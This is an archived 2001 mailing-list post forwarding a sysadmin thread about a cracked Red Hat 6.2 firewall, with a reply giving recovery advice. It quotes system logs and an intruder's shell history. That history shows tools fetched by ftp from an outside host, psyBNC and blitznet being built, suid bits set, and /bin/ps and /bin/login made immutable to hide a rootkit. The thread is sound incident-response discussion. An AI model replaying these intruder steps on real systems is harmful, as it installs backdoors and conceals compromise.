[CLUE-Tech] Fwd: Re: blitznet crack attack

jimintriglia at americanisp.net jimintriglia at americanisp.net
Fri Jun 15 07:07:45 MDT 2001 

Greetings All,

Interesting post/info on the PortSentry mailist (see what follows) re: another
successfull crack that PortSentry caught after the fact (the damage was done).

For Discussion:

1) .bash_history that is being reviewed in the post... would that file be
located in the /home/daemon directory, root user directoy of what?

2) If PortSentry posts an AttackAlert, what/where .bash_history files should be
viewed and inspected to see what the cracker was up to?

3) I've seen attempts on my own system via port 1080. This is used by servers
running as proxy servers, yes?

Bonus Questions: What did the cracker do, and how did he get in? How could this
have been prevented?

-JimI.

Jim Intriglia
IT Systems and Software Developer
www.JimIntriglia.com

Forwarded Message:
> To: jimintriglia at americanisp.net
> From: "Jim Intriglia" <jimintriglia at hotmail.com>
> Subject: Fwd: Re: [Abacus] blitznet hack
> Date: Fri, 15 Jun 2001 12:39:46 
> -----
> 
> 
> 
> >From: "J.D. Stevens" <dave at stevens.com>
> >To: Ian Campbell <ijac79 at hotmail.com>
> >CC: abacus at psionic.com
> >Subject: Re: [Abacus] blitznet hack
> >Date: Fri, 15 Jun 2001 06:19:12 -0500
> >
> >Disconnect from the Internet. Put in a new disk drive for the operating 
> >system.
> >Install the operating system of your choice. Install ALL SECURITY PATCHES.
> >Disable any unnecessary services. Put in appropriate monitoring, blocking, 
> >and
> >notification software. I use Tripwire, Portsentry, and Logcheck. Change all
> >passwords on any machines that this one could sniff. Mount the hacked disk 
> >read
> >only in order to extract configurations, account information, etc.
> >
> >Be sure to check any systems accessible from or through the hacked machine. 
> >Who
> >knows what they picked up with the sniffer.
> >
> >Hackers got into my RH 6.2 machine in January through wu-ftd. I had it
> >configured properly, but didn't get a security patch in soon enough. After 
> >I
> >rebuilt, they tried many more times to break in. So far so good. There are
> >several vulnerabilities in RH 6.2 as it comes out of the box. The Red Hat 
> >web
> >site has information on steps to take to secure the system.
> >
> >My server is a leased system at Rackspace. They provided excellent support 
> >after
> >the hack. They provided the suggestion to put in the new drive and mount 
> >the old
> >one read-only. They had the new drive and OS installed within four hours of 
> >my
> >call. It took me an additional 14 hours to reconfigure the system. I do all 
> >of
> >the work remotely. I've never seen or touched the server.
> >
> >   Good luck,
> >
> >   Dave Stevens
> >   STEVENS.COM, Inc.
> >   Houston, TX, USA
> >
> >Ian Campbell wrote:
> > >
> > > Well, got a bit of shock this morning when I couldn't ssh into the 
> >firewall at
> > > a client site.  I got one of the techs there to have a look and sure 
> >enough at
> > > the login was the message "eth0 running in promiscous mode'  Not a good 
> >start.
> > >
> > > The logs shows a lot of things that I don't want to see.
> > >
> > >
> > >
> > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
> > >
> > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete 
> >config
> > > entry (skipped)
> > >
> > > Jun 15 04:54:34 gw inet: inetd startup succeeded
> > >
> > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
> > >
> > > Jun 15 04:55:17 gw inet: inetd startup succeeded
> > >
> > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon 
> >by
> > > (uid=0)
> > >
> > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more recent than
> > > /lib/modules/2.2.14-5.0/modules.dep
> > >
> > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
> > >
> > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
> > >
> > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user daemon 
> >by
> > > (uid=0)
> > >
> > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more recent than
> > > /lib/modules/2.2.14-5.0/modules.dep
> > >
> > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module net-pf-10
> > >
> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host:
> > > proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
> > >
> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has 
> >been
> > > blocked via wrappers with string: "ALL: 130.227.3.123"
> > >
> > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host 130.227.3.123 has 
> >been
> > > blocked via dropped route using command: "/sbin/ipchains -I input -s
> > > 130.227.3.123 -j DENY -l"
> > >
> > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more recent than
> > > /lib/modules/2.2.14-5.0/modules.dep
> > >
> > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module net-pf-10
> > >
> > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000 T=48 
> >SYN
> > > (#1)
> > >
> > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000 T=48 SYN 
> >(#1)
> > >
> > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000 T=48 
> >SYN (#1)
> > >
> > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
> > >
> > > Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
> > >
> > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
> > >
> > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
> > >
> > >
> > > .bash_history shows what they were up to
> > >
> > > ls -al
> > > pico /etc/inetd.conf
> > > /etc/et
> > > /etc/rc.d/init.d/inet restart
> > > cd /lib/libx.so
> > > ls -al
> > > mv xp mountd
> > > chmod +xs mountd
> > > ls -al
> > > ftp h9.s5.com
> > > ls -al
> > > hostname
> > > gunzip *.gz
> > > ls -al
> > > tar -xvf blitznet.tar
> > > tar -xvf psyBNC2.2.1.tar
> > > ls -al
> > > rm *.tar
> > > chown daemon psybnc
> > > chgrp daemon psybnc
> > > cd psybnc
> > > make
> > > chown daemon *
> > > chgrp daemon *
> > > su daemon
> > > locate bnc
> > > locate psybnc
> > > find / -name psybnc
> > > cd /
> > > locate bnc
> > > cd /lib/libx.so
> > > ls -al
> > > cd psybnc
> > > su daemon
> > > ls -al
> > > cd ..
> > > ls -al
> > > mv lib libtty
> > > chmod +x libtty ps
> > > chmod +xs wipe
> > > ls -al
> > > ./ps psybnc libtty mountd hellnine slice2
> > > chattr +ai /bin/ps
> > > chattr +ai /bin/.ps
> > > chattr +ai /bin/login
> > > ls -al
> > > ./libtty
> > > ps -aux
> > > ls -al
> > > uptime
> > > exit
> > >
> > >
> > > So, I'm still not sure how they actually got in.  The box is running 
> >redhat
> > > 6.2 without any patches.  What now.  How can I  clean my system?
> > >
> > > Should I be upgrading my inetd version?  Can anyone offer any advice or 
> >point
> > > me to security list that can?
> > >
> > > Going to be a busy day.
> > >
> > > Ian
> > >
> > > 
> >------------------------------------------------------------------------------
> > > Get Your Private, Free E-mail from MSN Hotmail at 
> >http://www.hotmail.com.
> > >
> > > _______________________________________________
> >
> >--
> >=====================================================================
> >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
> >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
> >                   |    Houston, TX, USA   |
> >=====================================================================
> >_______________________________________________
> 
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com
> 
>

More information about the clue-tech mailing list